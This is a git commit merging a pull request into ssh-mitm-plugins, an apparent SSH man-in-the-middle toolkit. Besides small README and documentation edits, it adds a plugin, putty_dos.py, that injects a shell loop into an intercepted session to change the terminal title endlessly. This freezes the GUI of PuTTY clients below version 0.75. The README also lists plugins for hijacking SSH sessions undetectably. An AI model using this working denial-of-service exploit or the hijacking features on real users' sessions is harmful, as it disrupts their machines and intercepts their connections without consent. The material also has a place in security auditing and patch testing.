Merge pull request #11 from JakobJBauer/main

manfred-kaiser · web-flow · commit 81fc167f6b84 · 2021-05-21T11:01:56.000+02:00
Added DoS Attack on Putty &lt; v0.75 clients
diff --git a/README.md b/README.md
@@ -16,6 +16,11 @@ Installing the ssh-mitm server including these plugins is very simple:
 
     $ pip install ssh-mitm-plugins
     
+Alternatively, ssh-mitm-plugins is featured as an optional dependency in the ssh-mitm package.
+Installation can occur through:
+    
+    $ pip install ssh-mitm[plugins]
+    
 The current version of the ssh-mitm server will be installed and additional advanced features
 will be available through these plugins. The ssh-mitm server will operate normally as described
 by the [ssh-mitm project](#ssh-mitm).
@@ -25,7 +30,8 @@ by the [ssh-mitm project](#ssh-mitm).
 Following advanced features will be made available through the modular runtime compilation of 
 the ssh-mitm server.
 
-#### SSH 
+#### SSH
+* injectorshell - a way to hijack a ssh session and execute commands on an separated shell
 * stealthshell - improving on the *injectorshell*, this ssh interface will
 make hijacking of a ssh session undetectable
 * scriptedshell - perfect for security audits and information gathering, this ssh interface executes
diff --git a/docs/index.rst b/docs/index.rst
@@ -1,8 +1,3 @@
-.. SSH-MITM Plugins documentation master file, created by
-   sphinx-quickstart on Tue Feb 23 09:35:30 2021.
-   You can adapt this file completely to your liking, but it should at least
-   contain the root `toctree` directive.
-
  SSH-MITM Plugins Documentation
 ============================================
 
diff --git a/docs/start.rst b/docs/start.rst
@@ -1,11 +1,11 @@
 Start
 ======
 
-With version 0.4.0 the [ssh-mitm](http://ssh-mitm.at/) projects locks the features
+With version 0.4.0 the `ssh-mitm <http://ssh-mitm.at/>`_ projects locks the features
 shipping with the core functionality of the program.
 It is now preferred that any additions to the
 feature-set is made through the modular capabilities that the ssh-mitm project is built upon. Using
 entrypoints in combination with modules anyone can make their own ssh-mitm plugins.
 
 Here you will find detailed feature-oriented documentation of the creators
-additions to the ssh-mitm project.
+additions to the ssh-mitm project.
diff --git a/ssh_mitm_plugins/__entrypoints__.py b/ssh_mitm_plugins/__entrypoints__.py
@@ -2,7 +2,8 @@
     'SSHBaseForwarder': [
         'scriptedshell = ssh_mitm_plugins.ssh.scriptedshell:SSHScriptedForwarder',
         'stealthshell = ssh_mitm_plugins.ssh.stealthshell:SSHStealthForwarder',
-        'injectorshell = ssh_mitm_plugins.ssh.injectorshell:SSHInjectableForwarder'
+        'injectorshell = ssh_mitm_plugins.ssh.injectorshell:SSHInjectableForwarder',
+        'puttydos = ssh_mitm_plugins.ssh.putty_dos:SSHPuttyDoSForwarder'
     ],
     'SCPBaseForwarder': [
 
diff --git a/ssh_mitm_plugins/ssh/putty_dos.py b/ssh_mitm_plugins/ssh/putty_dos.py
@@ -0,0 +1,27 @@
+from ssh_proxy_server.forwarders.ssh import SSHForwarder
+
+
+class SSHPuttyDoSForwarder(SSHForwarder):
+    """PuTTY < 0.75: DoS on Windows/Linux clients
+
+    Security fix: a server could DoS the whole Windows/Linux GUI by telling
+    the PuTTY window to change its title repeatedly at high speed.
+
+    PuTTY-Changelog: https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html
+    """
+
+    def __init__(self, session):
+        super().__init__(session)
+        self.exploit = [
+            "PS1=''",
+            "while :",
+            "do",
+            "echo -ne '\\033]0: NEW_TITLE${RANDOM} \\007'",
+            "done"
+        ]
+        self.executed = False
+
+    def forward_extra(self):
+        if not self.executed:
+            self.server_channel.sendall('\n'.join(self.exploit) + '\n')
+            self.executed = True
